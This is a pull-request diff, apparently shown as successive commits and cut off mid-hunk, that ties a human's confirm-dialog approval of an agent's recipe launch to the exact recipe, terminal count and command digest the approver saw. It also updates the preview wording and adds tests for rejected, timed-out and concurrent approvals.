### PR TITLE
feat(recipes): let a confirm-dialog approval cover the whole recipe

### DIFF
--- a/electron/services/mcp-server/generated/mcpExternalBaseManifest.ts
+++ b/electron/services/mcp-server/generated/mcpExternalBaseManifest.ts
@@ -1153,7 +1153,7 @@ export const MCP_EXTERNAL_BASE_MANIFEST: readonly ActionManifestEntry[] = [
     dangerRationale:
       "Spawns the recipe's terminals, each running shell commands or launching agents. Agent-initiated runs are confirmation-gated so a single dispatch can't open many terminals unprompted.",
     description:
-      "Launch the terminals a saved recipe defines, in one worktree, as a repeatable multi-pane setup. Launch a single agent or a plain terminal instead when only one pane is wanted. This creates several panels at once and starts their configured commands or agents. An automated caller gets at most the first three of them; the rest come back as failures, so check what actually started.",
+      "Launch the terminals a saved recipe defines, in one worktree, as a repeatable multi-pane setup. Launch a single agent or a plain terminal instead when only one pane is wanted. This creates several panels at once and starts their configured commands or agents. Approving its prompt starts every terminal; a pre-authorized call starts at most three, so check what actually started.",
     enabled: true,
     id: "recipe.run",
     inputSchema: {

--- a/shared/types/actions.ts
+++ b/shared/types/actions.ts
@@ -211,25 +211,33 @@ export interface ActionContext {
 /**
  * The recipe run one human approval in the host confirm dialog covers (#12263).
  *
- * Names WHAT was offered, not merely that something was: the resolved recipe
- * whose terminals the dialog listed, and how many of them it said would start.
- * Both halves are load-bearing. `getRecipeById` follows shadowing, so the id a
- * caller asked for and the recipe that actually runs can differ (#8725) —
- * matching on the resolved id is what stops an approval for one recipe from
- * authorizing a different winner that appeared since. The count is the blast
- * radius the approver was shown, so a recipe that grew between the preview and
- * the run cannot start terminals nobody was offered.
+ * Names WHAT was offered, not merely that something was, in three parts that
+ * together pin the offer to one recipe, one size and one set of commands.
  *
- * A mismatch on either half falls back to the unapproved ceiling rather than
- * failing the run: granting less than was asked for is the safe direction, and
- * it leaves a benign shadowing race behaving exactly like an unapproved call
- * instead of turning it into a hard error (#8331).
+ * `recipeId` is the RESOLVED winner: `getRecipeById` follows shadowing, so the
+ * id a caller asked for and the recipe that actually runs can differ (#8725).
+ * `terminalCount` is the blast radius the approver read, so a recipe that grew
+ * between the preview and the run cannot start terminals nobody was offered.
+ * `terminalsDigest` covers the contents, because the first two are satisfied by
+ * a recipe whose commands were rewritten under the same id while the dialog
+ * waited — which is a live window, not a theoretical one, since the composites
+ * await a worktree creation before their recipe runs.
+ *
+ * An approval that fails ANY of the three authorizes nothing at all — not the
+ * unapproved ceiling. The two cases are genuinely different: an absent approval
+ * means nobody was shown anything and the conservative default applies, while a
+ * failed one is positive evidence that what will run is not what was approved.
+ * Falling back there would start terminals off the back of an approval for
+ * something else, so the run reports every index as a failure and the caller
+ * asks again (#8331).
  */
 export interface HostApprovedRecipeRun {
   /** The recipe the dialog previewed, after shadow resolution (#8725). */
   recipeId: string;
   /** How many terminals the dialog said would start. */
   terminalCount: number;
+  /** Fingerprint of the terminals it listed — see `recipeApprovalDigest`. */
+  terminalsDigest: string;
 }
 
 /**

--- a/shared/types/actions.ts
+++ b/shared/types/actions.ts
@@ -190,6 +190,46 @@ export interface ActionContext {
    * list as permission to act on the full request.
    */
   hostApprovedTargets?: readonly HostApprovedTarget[];
+  /**
+   * The recipe run a human approved in the host confirm dialog, for a dispatch
+   * that spawns a recipe's terminals (#12263). Set by `ActionService.dispatch`
+   * from {@link ActionDispatchOptions.hostApprovedRecipeRun} on the same terms
+   * as {@link hostApprovedTargets}: host-only, never on any `argsSchema`, and
+   * stamped over whatever a `contextOverride` claimed.
+   *
+   * Absent is the default and the fail-safe. It means no dialog listed this
+   * recipe's terminals — an unconfirmed call, or one pre-authorized by a
+   * standing automation grant, which names a tool in Settings and shows nobody
+   * a preview. Those keep the smaller unapproved ceiling
+   * (`MAX_AGENT_RECIPE_TERMINALS`). Present means a human read the terminals
+   * the dialog listed and approved starting them, so the run may start that
+   * many rather than the first three.
+   */
+  hostApprovedRecipeRun?: HostApprovedRecipeRun;
+}
+
+/**
+ * The recipe run one human approval in the host confirm dialog covers (#12263).
+ *
+ * Names WHAT was offered, not merely that something was: the resolved recipe
+ * whose terminals the dialog listed, and how many of them it said would start.
+ * Both halves are load-bearing. `getRecipeById` follows shadowing, so the id a
+ * caller asked for and the recipe that actually runs can differ (#8725) —
+ * matching on the resolved id is what stops an approval for one recipe from
+ * authorizing a different winner that appeared since. The count is the blast
+ * radius the approver was shown, so a recipe that grew between the preview and
+ * the run cannot start terminals nobody was offered.
+ *
+ * A mismatch on either half falls back to the unapproved ceiling rather than
+ * failing the run: granting less than was asked for is the safe direction, and
+ * it leaves a benign shadowing race behaving exactly like an unapproved call
+ * instead of turning it into a hard error (#8331).
+ */
+export interface HostApprovedRecipeRun {
+  /** The recipe the dialog previewed, after shadow resolution (#8725). */
+  recipeId: string;
+  /** How many terminals the dialog said would start. */
+  terminalCount: number;
 }
 
 /**
@@ -513,6 +553,13 @@ export interface ActionDispatchOptions {
    * only by the MCP renderer bridge, from the rows the approver left checked.
    */
   hostApprovedTargets?: readonly HostApprovedTarget[];
+  /**
+   * Trusted record of the recipe a host confirmation offered and a human
+   * approved — NOT a client-supplied value. See
+   * {@link ActionContext.hostApprovedRecipeRun}. Set only by the MCP renderer
+   * bridge, from the preview the approver actually read.
+   */
+  hostApprovedRecipeRun?: HostApprovedRecipeRun;
 }
 
 export interface ActionDispatchPayload {

--- a/src/components/TerminalRecipe/__tests__/recipeConfirmPreview.test.ts
+++ b/src/components/TerminalRecipe/__tests__/recipeConfirmPreview.test.ts
@@ -37,7 +37,7 @@ describe("formatRecipePreviewLines (#11860)", () => {
           { type: "dev-preview", devCommand: "npm run preview" },
         ],
       }),
-      { agentTerminalCap: 3, spawns: true }
+      { spawns: true }
     ).join("\n");
     expect(lines).toContain("npm run dev -- --port 5173");
     expect(lines).toContain("npm run preview");
@@ -52,7 +52,7 @@ describe("formatRecipePreviewLines (#11860)", () => {
           { type: "terminal", command: "deploy", env: { API_TOKEN: "sk-secret", REGION: "eu" } },
         ],
       }),
-      { agentTerminalCap: 3, spawns: true }
+      { spawns: true }
     ).join("\n");
     expect(lines).toContain("API_TOKEN");
     expect(lines).toContain("REGION");
@@ -60,7 +60,11 @@ describe("formatRecipePreviewLines (#11860)", () => {
     expect(lines).not.toContain("eu");
   });
 
-  it("marks the terminals the agent cap will not start", () => {
+  it("offers every terminal, with none struck off the tail (#12263)", () => {
+    // Approving this dialog is what lifts the unapproved agent cap, so the
+    // offer is the whole recipe. The old "Starts 2 of 4 … at most 2" framing
+    // with a struck-through tail would now understate what the click buys,
+    // which misleads an approver exactly as badly as overstating it.
     const lines = formatRecipePreviewLines(
       recipe({
         terminals: [
@@ -70,19 +74,23 @@ describe("formatRecipePreviewLines (#11860)", () => {
           { type: "terminal", command: "four" },
         ],
       }),
-      { agentTerminalCap: 2, spawns: true }
+      { spawns: true }
     );
-    const skipped = lines.filter((line) => line.includes("not started"));
-    expect(skipped).toHaveLength(2);
-    expect(skipped.every((line) => /three|four/.test(line))).toBe(true);
-    expect(lines.join("\n")).toContain("2 of 4");
+    const joined = lines.join("\n");
+    expect(joined).toContain("Starts 4 terminals");
+    expect(joined).not.toContain("not started");
+    expect(joined).not.toContain("of 4");
+    expect(joined).not.toContain("at most");
+    // Every command is still listed — the count is the claim, the commands are
+    // the evidence for it.
+    for (const command of ["one", "two", "three", "four"]) {
+      expect(joined).toContain(command);
+    }
   });
 
-  it("does not claim a cap applies when every terminal runs", () => {
-    const lines = formatRecipePreviewLines(recipe(), { agentTerminalCap: 3, spawns: true }).join(
-      "\n"
-    );
-    expect(lines).not.toContain("of 1");
+  it("says one terminal, not one terminals", () => {
+    const lines = formatRecipePreviewLines(recipe(), { spawns: true }).join("\n");
+    expect(lines).toContain("Starts 1 terminal:");
     expect(lines).not.toContain("not started");
   });
 
@@ -91,7 +99,7 @@ describe("formatRecipePreviewLines (#11860)", () => {
       recipe({
         terminals: [{ type: "claude", args: "--model opus", initialPrompt: "fix the bug" }],
       }),
-      { agentTerminalCap: 3, spawns: true }
+      { spawns: true }
     ).join("\n");
     expect(lines).toContain("claude --model opus");
     expect(lines).toContain("fix the bug");
@@ -101,7 +109,7 @@ describe("formatRecipePreviewLines (#11860)", () => {
     const long = "x".repeat(500);
     const lines = formatRecipePreviewLines(
       recipe({ terminals: [{ type: "terminal", command: long }] }),
-      { agentTerminalCap: 3, spawns: true }
+      { spawns: true }
     );
     const commandLine = lines.find((line) => line.includes("x"))!;
     expect(commandLine.length).toBeLessThan(long.length);
@@ -110,7 +118,7 @@ describe("formatRecipePreviewLines (#11860)", () => {
 
   it("says so explicitly when the recipe could not be resolved", () => {
     // An empty preview would read as "this recipe does nothing".
-    const lines = formatRecipePreviewLines(null, { agentTerminalCap: 3, spawns: true });
+    const lines = formatRecipePreviewLines(null, { spawns: true });
     expect(lines).toHaveLength(1);
     expect(lines[0]).toMatch(/couldn't resolve/i);
   });
@@ -118,7 +126,7 @@ describe("formatRecipePreviewLines (#11860)", () => {
   it("does not claim a non-spawning dispatch will start anything", () => {
     // recipe.delete and recipe.saveToRepo are gated and preview the same
     // content; telling the approver those terminals are about to run would be
-    // false, and the agent cap does not apply to them at all.
+    // false, since these dispatches start nothing at all.
     const lines = formatRecipePreviewLines(
       recipe({
         terminals: [
@@ -128,7 +136,7 @@ describe("formatRecipePreviewLines (#11860)", () => {
           { type: "terminal", command: "four" },
         ],
       }),
-      { agentTerminalCap: 2, spawns: false }
+      { spawns: false }
     );
     const joined = lines.join("\n");
     expect(joined).not.toContain("Starts");

--- a/src/components/TerminalRecipe/recipeConfirmPreview.ts
+++ b/src/components/TerminalRecipe/recipeConfirmPreview.ts
@@ -56,41 +56,42 @@ function describeTerminal(terminal: RecipeTerminal): string[] {
  * Render the recipe's terminals for a confirmation dialog.
  *
  * `spawns` selects the framing. A dispatch that will actually start the
- * terminals says so and marks the ones the per-run agent cap trims off the tail
- * — an approver told "runs 5 terminals" when only 3 start has been shown
- * something untrue. A dispatch that merely names the recipe (deleting it,
- * copying it, opening its editor) is gated too and shows the same content, but
- * describing it as starting would be equally untrue.
+ * terminals says so; one that merely names the recipe (deleting it, copying it,
+ * opening its editor) is gated too and shows the same content, but describing
+ * it as starting would be untrue.
+ *
+ * Every terminal is listed as starting, with no trimmed tail. That is what the
+ * approval now buys: approving this dialog is the thing that lifts the smaller
+ * unapproved ceiling, so the offer and the run are the same size (#12263). The
+ * dialog used to say "Starts 3 of 5 terminals (an automated caller gets at most
+ * 3)" and strike out the rest, because approval covered only the first three.
+ * Framing it that way now would understate what the click authorizes, which is
+ * the same failure as overstating it — an approver has to be shown exactly what
+ * will run.
  *
  * `null` means the id resolved to nothing — surfaced explicitly rather than as
  * an empty preview, which would read as "this recipe does nothing".
  */
 export function formatRecipePreviewLines(
   recipe: TerminalRecipe | null,
-  options: { agentTerminalCap: number; spawns: boolean }
+  options: { spawns: boolean }
 ): string[] {
   if (!recipe) {
     return ["Couldn't resolve this recipe — it may have been deleted or its plugin unloaded."];
   }
 
   const total = recipe.terminals.length;
-  const running = options.spawns ? Math.min(total, Math.max(options.agentTerminalCap, 0)) : total;
   const lines = [`${recipe.name} — ${recipeOriginLabel(recipe)}`];
-  if (!options.spawns) {
-    lines.push(`Defines ${total} terminal${total === 1 ? "" : "s"}:`);
-  } else if (running === total) {
-    lines.push(`Starts ${total} terminal${total === 1 ? "" : "s"}:`);
-  } else {
-    lines.push(
-      `Starts ${running} of ${total} terminals (an automated caller gets at most ${options.agentTerminalCap}):`
-    );
-  }
+  lines.push(
+    options.spawns
+      ? `Starts ${total} terminal${total === 1 ? "" : "s"}:`
+      : `Defines ${total} terminal${total === 1 ? "" : "s"}:`
+  );
 
   recipe.terminals.forEach((terminal, index) => {
     const [head, ...rest] = describeTerminal(terminal);
-    const skipped = index >= running ? " — not started" : "";
     const title = terminal.title ? `${terminal.title}: ` : "";
-    lines.push(`${index + 1}. ${title}${head ?? terminal.type}${skipped}`);
+    lines.push(`${index + 1}. ${title}${head ?? terminal.type}`);
     for (const line of rest) lines.push(`   ${line}`);
   });
 

--- a/src/hooks/__tests__/useMcpBridge.test.tsx
+++ b/src/hooks/__tests__/useMcpBridge.test.tsx
@@ -1942,9 +1942,102 @@ describe("useMcpBridge", () => {
     expect(mocks.dispatch).toHaveBeenCalledWith(
       "recipe.run",
       expect.objectContaining({ recipeId: "winner" }),
-      expect.objectContaining({ confirmed: true })
+      // The approval names the winner too, not the id the caller asked for —
+      // recipeStore matches on the resolved id, so a scope naming "shadowed"
+      // would silently fall back to the unapproved cap (#12263).
+      expect.objectContaining({
+        confirmed: true,
+        hostApprovedRecipeRun: { recipeId: "winner", terminalCount: 1 },
+      })
     );
     useRecipeStore.getState().reset();
+  });
+
+  describe("recipe run approval scope (#12263)", () => {
+    const fiveTerminalRecipe = {
+      id: "recipe-1",
+      name: "Fleet",
+      projectId: "p1",
+      terminals: Array.from({ length: 5 }, (_, i) => ({
+        type: "terminal" as const,
+        command: `step-${i}`,
+      })),
+      createdAt: 1,
+    };
+
+    async function seedRecipe() {
+      const { useRecipeStore } = await import("@/store/recipeStore");
+      useRecipeStore.setState({ recipes: [fiveTerminalRecipe] });
+      return useRecipeStore;
+    }
+
+    it("offers every terminal and carries the approved count into the dispatch", async () => {
+      const useRecipeStore = await seedRecipe();
+      mocks.get.mockReturnValue(confirmManifestEntry({ id: "recipe.run", name: "recipe.run" }));
+      mocks.dispatch.mockResolvedValue({ ok: true, result: { ok: true } });
+      renderHook(() => useMcpBridge());
+
+      const dispatched = dispatchHandler?.({
+        requestId: "req-scope",
+        actionId: "recipe.run",
+        args: { recipeId: "recipe-1" },
+      });
+      await Promise.resolve();
+      await Promise.resolve();
+
+      // What the approver reads and what the approval authorizes are the same
+      // number, by construction — both come from the one resolved recipe.
+      const preview = (useMcpConfirmStore.getState().current?.preview ?? []).join("\n");
+      expect(preview).toContain("Starts 5 terminals");
+      expect(preview).not.toContain("not started");
+
+      useMcpConfirmStore.getState().resolveCurrent("approved");
+      await dispatched;
+
+      const options = mocks.dispatch.mock.calls[0]?.[2] as Record<string, unknown>;
+      expect(options.source).toBe("agent");
+      expect(options.hostApprovedRecipeRun).toEqual({ recipeId: "recipe-1", terminalCount: 5 });
+      useRecipeStore.getState().reset();
+    });
+
+    it("carries no approval scope for a pre-granted dispatch that showed no modal", async () => {
+      // A standing automation grant names a tool in Settings — no arguments, no
+      // preview, nobody shown five terminals. It must stay on the unapproved
+      // cap, which is exactly what an absent scope means downstream.
+      const useRecipeStore = await seedRecipe();
+      mocks.get.mockReturnValue(confirmManifestEntry({ id: "recipe.run", name: "recipe.run" }));
+      mocks.dispatch.mockResolvedValue({ ok: true, result: { ok: true } });
+      renderHook(() => useMcpBridge());
+
+      await dispatchHandler?.({
+        requestId: "req-granted",
+        actionId: "recipe.run",
+        args: { recipeId: "recipe-1" },
+        confirmed: true,
+      });
+
+      const options = mocks.dispatch.mock.calls[0]?.[2] as Record<string, unknown>;
+      expect(options.hostApprovedRecipeRun).toBeUndefined();
+      useRecipeStore.getState().reset();
+    });
+
+    it("dispatches no approval scope when the approver rejected", async () => {
+      const useRecipeStore = await seedRecipe();
+      mocks.get.mockReturnValue(confirmManifestEntry({ id: "recipe.run", name: "recipe.run" }));
+      renderHook(() => useMcpBridge());
+
+      const dispatched = dispatchHandler?.({
+        requestId: "req-reject",
+        actionId: "recipe.run",
+        args: { recipeId: "recipe-1" },
+      });
+      await Promise.resolve();
+      useMcpConfirmStore.getState().resolveCurrent("rejected");
+      await dispatched;
+
+      expect(mocks.dispatch).not.toHaveBeenCalled();
+      useRecipeStore.getState().reset();
+    });
   });
   describe("batch terminal kill dispatch (#12123)", () => {
     function killBatchManifestEntry() {
@@ -2869,6 +2962,51 @@ describe("forge write previews (#12118)", () => {
     expect(lines.join("\n")).toContain("line two");
     expect(mocks.buildGitPreview).not.toHaveBeenCalled();
     expect(mocks.buildPreview).not.toHaveBeenCalled();
+  });
+
+  it("offers a spawning recipe's full terminal count, and nothing for a non-spawning one", async () => {
+    const { useRecipeStore } = await import("@/store/recipeStore");
+    useRecipeStore.setState({
+      recipes: [
+        {
+          id: "recipe-1",
+          name: "Fleet",
+          projectId: "p1",
+          terminals: [
+            { type: "terminal", command: "a" },
+            { type: "terminal", command: "b" },
+          ],
+          createdAt: 1,
+        },
+      ],
+    });
+
+    const spawning = await buildMcpConfirmPreview({
+      kind: "recipe",
+      recipeId: "recipe-1",
+      resolvedRecipeId: "recipe-1",
+      spawns: true,
+    });
+    expect(spawning.approvedRecipeRun).toEqual({ recipeId: "recipe-1", terminalCount: 2 });
+
+    // recipe.delete / recipe.saveToRepo are gated and preview the same content,
+    // but start nothing — there is no spawn for an approval to authorize.
+    const naming = await buildMcpConfirmPreview({
+      kind: "recipe",
+      recipeId: "recipe-1",
+      resolvedRecipeId: "recipe-1",
+      spawns: false,
+    });
+    expect(naming.approvedRecipeRun).toBeUndefined();
+
+    const missing = await buildMcpConfirmPreview({
+      kind: "recipe",
+      recipeId: "gone",
+      resolvedRecipeId: "gone",
+      spawns: true,
+    });
+    expect(missing.approvedRecipeRun).toBeUndefined();
+    useRecipeStore.getState().reset();
   });
 
   it("builds the comment preview synchronously, with no fetch", async () => {

--- a/src/hooks/__tests__/useMcpBridge.test.tsx
+++ b/src/hooks/__tests__/useMcpBridge.test.tsx
@@ -1945,7 +1945,7 @@ describe("useMcpBridge", () => {
       expect.objectContaining({ recipeId: "winner" }),
       // The approval names the winner too, not the id the caller asked for —
       // recipeStore matches on the resolved id, so a scope naming "shadowed"
-      // would silently fall back to the unapproved cap (#12263).
+      // would authorize nothing at all rather than the recipe here (#12263).
       expect.objectContaining({
         confirmed: true,
         hostApprovedRecipeRun: expect.objectContaining({
@@ -3113,7 +3113,7 @@ describe("forge write previews (#12118)", () => {
     expect(spawning.approvedRecipeRun).toEqual({
       recipeId: "recipe-1",
       terminalCount: 2,
-      terminalsDigest: expect.stringMatching(/^[0-9a-f]{8}$/),
+      terminalsDigest: expect.stringMatching(/^[0-9a-f]{16}$/),
     });
 
     // recipe.delete / recipe.saveToRepo are gated and preview the same content,

--- a/src/hooks/__tests__/useMcpBridge.test.tsx
+++ b/src/hooks/__tests__/useMcpBridge.test.tsx
@@ -3,6 +3,7 @@ import { renderHook } from "@testing-library/react";
 import { afterEach, beforeEach, describe, expect, it, vi } from "vitest";
 import type { ActionManifestEntry } from "@shared/types/actions";
 import { __resetMcpConfirmStoreForTesting, useMcpConfirmStore } from "@/store/mcpConfirmStore";
+import { recipeApprovalDigest } from "@/utils/recipeApprovalDigest";
 import { isMcpSpawnFocusSuppressed } from "@/store/mcpSpawnFocusGuard";
 import {
   resetStoreAccessorsForTesting,
@@ -1947,7 +1948,10 @@ describe("useMcpBridge", () => {
       // would silently fall back to the unapproved cap (#12263).
       expect.objectContaining({
         confirmed: true,
-        hostApprovedRecipeRun: { recipeId: "winner", terminalCount: 1 },
+        hostApprovedRecipeRun: expect.objectContaining({
+          recipeId: "winner",
+          terminalCount: 1,
+        }),
       })
     );
     useRecipeStore.getState().reset();
@@ -1970,6 +1974,13 @@ describe("useMcpBridge", () => {
       useRecipeStore.setState({ recipes: [fiveTerminalRecipe] });
       return useRecipeStore;
     }
+
+    // Not left to a tail-position reset in each case: an assertion that throws
+    // would skip it and leak seeded recipes into the next test.
+    afterEach(async () => {
+      const { useRecipeStore } = await import("@/store/recipeStore");
+      useRecipeStore.getState().reset();
+    });
 
     it("offers every terminal and carries the approved count into the dispatch", async () => {
       const useRecipeStore = await seedRecipe();
@@ -1996,7 +2007,94 @@ describe("useMcpBridge", () => {
 
       const options = mocks.dispatch.mock.calls[0]?.[2] as Record<string, unknown>;
       expect(options.source).toBe("agent");
-      expect(options.hostApprovedRecipeRun).toEqual({ recipeId: "recipe-1", terminalCount: 5 });
+      expect(options.hostApprovedRecipeRun).toEqual({
+        recipeId: "recipe-1",
+        terminalCount: 5,
+        terminalsDigest: recipeApprovalDigest(fiveTerminalRecipe.terminals),
+      });
+      useRecipeStore.getState().reset();
+    });
+
+    it("issues an approval for every action that starts a recipe, not just recipe.run", async () => {
+      // RECIPE_SPAWNING_ACTIONS membership is what issues the approval now, so
+      // dropping a composite from it would preview five terminals honestly and
+      // then silently start three.
+      for (const actionId of [
+        "recipe.run",
+        "worktree.createWithRecipe",
+        "workflow.startWorkOnIssue",
+      ]) {
+        const useRecipeStore = await seedRecipe();
+        mocks.dispatch.mockReset().mockResolvedValue({ ok: true, result: { ok: true } });
+        mocks.get.mockReturnValue(confirmManifestEntry({ id: actionId, name: actionId }));
+        renderHook(() => useMcpBridge());
+
+        const dispatched = dispatchHandler?.({
+          requestId: `req-${actionId}`,
+          actionId,
+          args: { recipeId: "recipe-1" },
+        });
+        await Promise.resolve();
+        await Promise.resolve();
+        useMcpConfirmStore.getState().resolveCurrent("approved");
+        await dispatched;
+
+        const options = mocks.dispatch.mock.calls[0]?.[2] as Record<string, unknown>;
+        expect(options.hostApprovedRecipeRun).toMatchObject({ terminalCount: 5 });
+        useRecipeStore.getState().reset();
+      }
+    });
+
+    it("keeps each pending request's offer to itself", async () => {
+      // The offer is a local in each dispatch handler invocation. Hoisting it
+      // into shared hook state would be invisible until two recipes are in
+      // flight at once — at which point one approval would authorize the
+      // other's terminals.
+      const { useRecipeStore } = await import("@/store/recipeStore");
+      const twoTerminalRecipe = {
+        id: "recipe-2",
+        name: "Pair",
+        projectId: "p1",
+        terminals: [
+          { type: "terminal" as const, command: "x" },
+          { type: "terminal" as const, command: "y" },
+        ],
+        createdAt: 1,
+      };
+      useRecipeStore.setState({ recipes: [fiveTerminalRecipe, twoTerminalRecipe] });
+      mocks.get.mockReturnValue(confirmManifestEntry({ id: "recipe.run", name: "recipe.run" }));
+      mocks.dispatch.mockResolvedValue({ ok: true, result: { ok: true } });
+      renderHook(() => useMcpBridge());
+
+      const first = dispatchHandler?.({
+        requestId: "req-a",
+        actionId: "recipe.run",
+        args: { recipeId: "recipe-1" },
+      });
+      const second = dispatchHandler?.({
+        requestId: "req-b",
+        actionId: "recipe.run",
+        args: { recipeId: "recipe-2" },
+      });
+      await Promise.resolve();
+      await Promise.resolve();
+
+      // The queue promotes one at a time; approve both in turn.
+      useMcpConfirmStore.getState().resolveCurrent("approved");
+      await first;
+      await Promise.resolve();
+      useMcpConfirmStore.getState().resolveCurrent("approved");
+      await second;
+
+      const byRecipe = new Map(
+        mocks.dispatch.mock.calls.map((call) => {
+          const args = call[1] as { recipeId: string };
+          const options = call[2] as { hostApprovedRecipeRun?: { terminalCount: number } };
+          return [args.recipeId, options.hostApprovedRecipeRun?.terminalCount];
+        })
+      );
+      expect(byRecipe.get("recipe-1")).toBe(5);
+      expect(byRecipe.get("recipe-2")).toBe(2);
       useRecipeStore.getState().reset();
     });
 
@@ -2032,9 +2130,34 @@ describe("useMcpBridge", () => {
         args: { recipeId: "recipe-1" },
       });
       await Promise.resolve();
+      await Promise.resolve();
+      // Assert the modal genuinely came up first: "dispatch not called" alone
+      // would also pass if the request had failed before any dialog appeared.
+      expect(useMcpConfirmStore.getState().current?.requestId).toBe("req-reject");
       useMcpConfirmStore.getState().resolveCurrent("rejected");
       await dispatched;
 
+      expect(mocks.dispatch).not.toHaveBeenCalled();
+      useRecipeStore.getState().reset();
+    });
+
+    it("dispatches no approval scope when the confirmation timed out", async () => {
+      const useRecipeStore = await seedRecipe();
+      mocks.get.mockReturnValue(confirmManifestEntry({ id: "recipe.run", name: "recipe.run" }));
+      renderHook(() => useMcpBridge());
+
+      const dispatched = dispatchHandler?.({
+        requestId: "req-timeout",
+        actionId: "recipe.run",
+        args: { recipeId: "recipe-1" },
+      });
+      await Promise.resolve();
+      await Promise.resolve();
+      expect(useMcpConfirmStore.getState().current?.requestId).toBe("req-timeout");
+      useMcpConfirmStore.getState().resolveCurrent("timeout");
+      await dispatched;
+
+      // An offer captured from a settled preview must not survive the timeout.
       expect(mocks.dispatch).not.toHaveBeenCalled();
       useRecipeStore.getState().reset();
     });
@@ -2987,7 +3110,11 @@ describe("forge write previews (#12118)", () => {
       resolvedRecipeId: "recipe-1",
       spawns: true,
     });
-    expect(spawning.approvedRecipeRun).toEqual({ recipeId: "recipe-1", terminalCount: 2 });
+    expect(spawning.approvedRecipeRun).toEqual({
+      recipeId: "recipe-1",
+      terminalCount: 2,
+      terminalsDigest: expect.stringMatching(/^[0-9a-f]{8}$/),
+    });
 
     // recipe.delete / recipe.saveToRepo are gated and preview the same content,
     // but start nothing — there is no spawn for an approval to authorize.

--- a/src/hooks/useMcpBridge.ts
+++ b/src/hooks/useMcpBridge.ts
@@ -44,6 +44,7 @@ import {
   type TerminalLaunchPreview,
 } from "@/lib/mcpTerminalLaunchPreview";
 import { useRecipeStore } from "@/store/recipeStore";
+import { recipeApprovalDigest } from "@/utils/recipeApprovalDigest";
 import {
   resolveWorktreeLocation,
   type WorktreeLocationArgs,
@@ -99,11 +100,16 @@ const TIMEOUT_RESULT: ActionDispatchResult = {
 
 /**
  * Of the gated actions that carry a `recipeId`, the ones that actually START
- * the recipe's terminals. Purely a wording concern for the confirm preview:
- * `recipe.delete` and `recipe.saveToRepo` are also gated and preview the same
- * content, but telling the approver those terminals are about to run would be
- * false. Getting this list wrong understates a dispatch's framing; it can never
- * skip a gate, which `resolveEffectiveActionDanger` owns from the args alone.
+ * the recipe's terminals. `recipe.delete` and `recipe.saveToRepo` are gated too
+ * and preview the same content, but telling the approver those terminals are
+ * about to run would be false.
+ *
+ * No longer only a wording concern: membership is also what issues the run
+ * approval (#12263), so an action dropped from this list previews its recipe
+ * honestly and then silently falls back to the three-terminal unapproved cap.
+ * Still cannot skip a gate in either direction — `resolveEffectiveActionDanger`
+ * owns that from the args alone — and a wrongly-added action would issue an
+ * approval nothing reads, since only the three launch paths forward it.
  */
 const RECIPE_SPAWNING_ACTIONS = new Set([
   "recipe.run",
@@ -724,6 +730,7 @@ export async function buildMcpConfirmPreview(
             approvedRecipeRun: {
               recipeId: recipe.id,
               terminalCount: recipe.terminals.length,
+              terminalsDigest: recipeApprovalDigest(recipe.terminals),
             },
           }
         : {}),

--- a/src/hooks/useMcpBridge.ts
+++ b/src/hooks/useMcpBridge.ts
@@ -43,7 +43,7 @@ import {
   formatTerminalLaunchPreviewLines,
   type TerminalLaunchPreview,
 } from "@/lib/mcpTerminalLaunchPreview";
-import { MAX_AGENT_RECIPE_TERMINALS, useRecipeStore } from "@/store/recipeStore";
+import { useRecipeStore } from "@/store/recipeStore";
 import {
   resolveWorktreeLocation,
   type WorktreeLocationArgs,
@@ -52,6 +52,7 @@ import type {
   ActionContext,
   ActionDispatchResult,
   ActionId,
+  HostApprovedRecipeRun,
   HostApprovedTarget,
 } from "@shared/types/actions";
 import type { McpConfirmationDecision, McpSessionOrigin } from "@shared/types/ipc/mcpServer";
@@ -679,6 +680,13 @@ export interface McpConfirmPreviewResult {
   lines: string[];
   /** Present only when the fetch put a D3 typed-name gate up (#12115). */
   typedNameTarget?: string;
+  /**
+   * What a spawning recipe dispatch's preview offered, for the approval to
+   * carry into the run (#12263). Built from the same resolved recipe the lines
+   * describe, so the count travelling with the approval is by construction the
+   * count the approver read.
+   */
+  approvedRecipeRun?: HostApprovedRecipeRun;
 }
 
 /**
@@ -706,10 +714,19 @@ export async function buildMcpConfirmPreview(
     // the resolve-time recipe so the lines reflect the store at modal-open.
     const recipe = useRecipeStore.getState().getRecipeById(target.resolvedRecipeId) ?? null;
     return {
-      lines: formatRecipePreviewLines(recipe, {
-        agentTerminalCap: MAX_AGENT_RECIPE_TERMINALS,
-        spawns: target.spawns,
-      }),
+      lines: formatRecipePreviewLines(recipe, { spawns: target.spawns }),
+      // Only for a dispatch that will actually start them, and only from the
+      // recipe the lines came from. A gated dispatch that merely names the
+      // recipe (delete, save, open the editor) starts nothing, so there is no
+      // spawn for an approval to authorize (#12263).
+      ...(target.spawns && recipe
+        ? {
+            approvedRecipeRun: {
+              recipeId: recipe.id,
+              terminalCount: recipe.terminals.length,
+            },
+          }
+        : {}),
     };
   }
   if (target.kind === "worktreeDelete") {
@@ -1033,6 +1050,15 @@ export function useMcpBridge(): void {
         // selected nothing — and an action that needs it refuses on its absence
         // rather than reading "approved" as "approved all of these".
         let hostApprovedTargets: HostApprovedTarget[] | undefined;
+        // The recipe half of the same attestation (#12263). Captured from the
+        // preview build, exactly like `approvedTypedNameTarget` above and for
+        // the same reason: the modal keeps approval disabled until `setPreview`
+        // lands, so a click can only ever land after this is set from the lines
+        // the approver is looking at. Stays undefined for a pre-granted
+        // dispatch, which builds no preview — so a standing automation grant
+        // keeps the smaller unapproved terminal cap rather than silently
+        // inheriting a ten-pane authority nobody was shown.
+        let approvedRecipeRun: HostApprovedRecipeRun | undefined;
         try {
           let effectiveConfirmed = confirmed;
 
@@ -1102,9 +1128,10 @@ export function useMcpBridge(): void {
               const previewPending = hasAsyncPreview;
               if (hasAsyncPreview && previewTarget !== undefined) {
                 void buildMcpConfirmPreview(previewTarget)
-                  .then(({ lines, typedNameTarget }) => {
+                  .then(({ lines, typedNameTarget, approvedRecipeRun: offered }) => {
                     if (disposed) return;
                     approvedTypedNameTarget = typedNameTarget;
+                    approvedRecipeRun = offered;
                     useMcpConfirmStore.getState().setPreview(requestId, lines, typedNameTarget);
                   })
                   // The builder already fails soft, but a rejection escaping it
@@ -1113,6 +1140,7 @@ export function useMcpBridge(): void {
                   // it unconditionally.
                   .catch(() => {
                     if (disposed) return;
+                    approvedRecipeRun = undefined;
                     useMcpConfirmStore.getState().setPreview(requestId, []);
                   });
               }
@@ -1258,6 +1286,7 @@ export function useMcpBridge(): void {
                 // back to live renderer context, unchanged behaviour.
                 contextOverride: context,
